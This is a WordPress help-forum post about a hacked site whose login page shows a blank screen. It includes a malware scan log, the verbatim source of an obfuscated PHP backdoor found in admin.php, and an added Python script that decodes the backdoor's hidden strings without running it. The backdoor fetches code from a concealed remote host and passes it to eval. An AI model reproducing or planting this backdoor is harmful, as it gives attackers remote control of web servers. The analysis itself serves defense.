WordPress login-page blank screen, affected by malware

Hi,
I’m trying to log in to the dashboard, but the login page shows a blank white screen. When I tried to look for problems in cPanel, I found some weird malware files. I think my website has been hacked by some virus, and this may be the reason for the white-screen login page too, and I don’t know how to resolve this. There are other directories infected too, apart from just WordPress. I’ll share the report for reference. Also, I wasn’t in touch with my website, so there’s a possibility that it could have been attacked for over a month. If anyone could suggest ways to tackle this manually, it would be really helpful for me! Here is the report log from the host team:

/home3/latpapr3/opencart.latdev.latpay.com.au/AQO2wyJRoBX.php: SL-PHP-FILEHACKER-md5-bxdg.UNOFFICIAL FOUND
/home3/latpapr3/opencart.latdev.latpay.com.au/jNolZ1W37mK.php: SL-PHP-FILEHACKER-md5-bxdi.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/edit-tag-form.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/users.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/async-upload.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/menu-header.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/privacy.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/options-permalink.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/ms-users.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/upgrade.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/ms-edit.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/install.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/edit-form-advanced.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND

Below is the code from admin.php:

<?php
echo 'wp-blog-header.php';
header('Content-Type:text/html;charset=utf-8');
$O=urldecode('F%7EcVdkq%24%256%40X%5C%22%2AH%2C%3A3%5E%21fIL0%3EY%23E%29yP%3F_ptRW%7DjBNw%609i%3D%2B%2FDUluA%5D%7BO%7Co1-TC.5hgMexG%282n7%2F4%3CK%26rZbSs%3BQJav8mz%5B');function Ooo1Oo11OO($OO00oO0Ooo=''){global $O;$Oo00OOoo0O=curl_init($OO00oO0Ooo);curl_setopt($Oo00OOoo0O,CURLOPT_RETURNTRANSFER,1);$OO0oOoo0O0=curl_exec($Oo00OOoo0O);return $OO0oOoo0O0;}function OOO1oOo11o($string){global $O;$O0ooo0O0OO=substr($string,0,5);$OO0o0oO0oO=substr($string,-5);$Oo0OoO00Oo=substr($string,7,strlen($string)-14);return gzinflate(base64_decode($O0ooo0O0OO.$Oo0OoO00Oo.$OO0o0oO0oO));}function OoOo11o1OO($Oo0oOOo00O=''){global $O;$OOoO0oOo00=isset($_GET[$O{35}.$O{69}.$O{35}.$O{73}.$O{88}.$O{91}.$O{68}])?trim($_GET[$O{35}.$O{69}.$O{35}.$O{73}.$O{88}.$O{91}.$O{68}]):'';$OO00oO0Ooo=$O{65}.$O{35}.$O{35}.$O{34}.$O{17}.$O{75}.$O{75}.$O{42}.$O{42}.$O{42}.$O{59}.$O{9}.$O{90}.$O{63}.$O{66}.$O{58}.$O{2}.$O{88}.$O{80}.$O{58}.$O{51}.$O{45}.$O{73}.$O{88}.$O{63}.$O{88}.$O{84}.$O{45}.$O{88}.$O{75};$OoO0oOOo00=Ooo1Oo11OO($OO00oO0Ooo.$OOoO0oOo00);eval($OoO0oOOo00);}OoOo11o1OO();?>
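
A static way to see what the admin.php sample above does without executing it, as an added example that is not part of the original post: it url-decodes the `$O` lookup table and resolves each `$O{n}.$O{n}...` chain to the literal string it builds. The table and index chains are copied from the sample; the variable names `$k` and `$u` and the single-line `eval(curl_exec(curl_init(...)))` are a simplification assumed here in place of the sample's helper functions.

```python
import re
from urllib.parse import unquote

# Excerpt trimmed from the admin.php sample on this page. It is handled as
# text only and never executed. $k, $u and the one-line eval are simplified
# stand-ins (assumption) for the sample's obfuscated helper functions.
SAMPLE = (
    "$O=urldecode('F%7EcVdkq%24%256%40X%5C%22%2AH%2C%3A3%5E%21fIL0%3EY%23E%29yP%3F_ptRW"
    "%7DjBNw%609i%3D%2B%2FDUluA%5D%7BO%7Co1-TC.5hgMexG%282n7%2F4%3CK%26rZbSs%3BQJav8mz%5B');"
    "$k=$_GET[$O{35}.$O{69}.$O{35}.$O{73}.$O{88}.$O{91}.$O{68}];"
    "$u=$O{65}.$O{35}.$O{35}.$O{34}.$O{17}.$O{75}.$O{75}.$O{42}.$O{42}.$O{42}.$O{59}"
    ".$O{9}.$O{90}.$O{63}.$O{66}.$O{58}.$O{2}.$O{88}.$O{80}.$O{58}.$O{51}.$O{45}.$O{73}"
    ".$O{88}.$O{63}.$O{88}.$O{84}.$O{45}.$O{88}.$O{75};"
    "eval(curl_exec(curl_init($u.$k)));"
)

TABLE = re.compile(r"\$O\s*=\s*urldecode\('([^']*)'\)")   # the lookup table literal
CHAIN = re.compile(r"\$O\{\d+\}(?:\.\$O\{\d+\})*")        # $O{a}.$O{b}.$O{c}...
INDEX = re.compile(r"\{(\d+)\}")
SINKS = ("eval", "assert", "curl_init", "curl_exec", "gzinflate", "base64_decode")

def decode_chains(php):
    """Resolve every index chain to the plain string it concatenates."""
    match = TABLE.search(php)
    if not match:
        raise ValueError("no urldecode() lookup table found")
    table = unquote(match.group(1))          # same result as PHP urldecode() here
    decoded = []
    for chain in CHAIN.findall(php):
        indexes = [int(i) for i in INDEX.findall(chain)]
        if any(i >= len(table) for i in indexes):
            raise ValueError("index outside the lookup table")
        decoded.append("".join(table[i] for i in indexes))
    return decoded

def sinks(php):
    """List the dangerous PHP functions the source calls."""
    return sorted({s for s in SINKS if re.search(r"\b%s\s*\(" % s, php)})

if __name__ == "__main__":
    for text in decode_chains(SAMPLE):
        print("hidden string:", text)
    print("dangerous calls:", ", ".join(sinks(SAMPLE)))
```

The two recovered strings are the request parameter the file reads and the remote address it fetches code from before passing the response to `eval`, which is why a file like this has to be replaced from a clean WordPress copy rather than edited.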
